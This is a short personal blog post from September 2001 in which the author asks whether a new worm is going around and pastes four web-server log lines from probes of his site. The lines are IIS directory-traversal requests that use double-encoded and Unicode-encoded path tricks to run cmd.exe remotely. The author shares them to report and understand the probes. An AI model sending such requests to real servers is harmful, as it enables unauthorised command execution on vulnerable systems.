So once again, there seems – Life listed chronologically

Life listed chronologically

Categories

Archives

Recent Posts

So once again, there seems

So once again, there seems to be some kind program trying to hack into my system. And once again, the twits doing it don’t seem to realize that I am not running IIS. The thing is, I’m getting hits for this from a ton of machines. Anyone know of a new worm making the rounds? The hits look like this:

209.67.61.53 – – [18/Sep/2001:10:03:56 -0400] “GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0” 404 320 “-” “-“
209.67.61.53 – – [18/Sep/2001:10:03:56 -0400] “GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0” 404 320 “-” “-“
209.67.61.53 – – [18/Sep/2001:10:03:56 -0400] “GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0” 404 336 “-” “-“
209.67.61.53 – – [18/Sep/2001:10:03:56 -0400] “GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0” 404 302 “-” “-“

September 18, 2001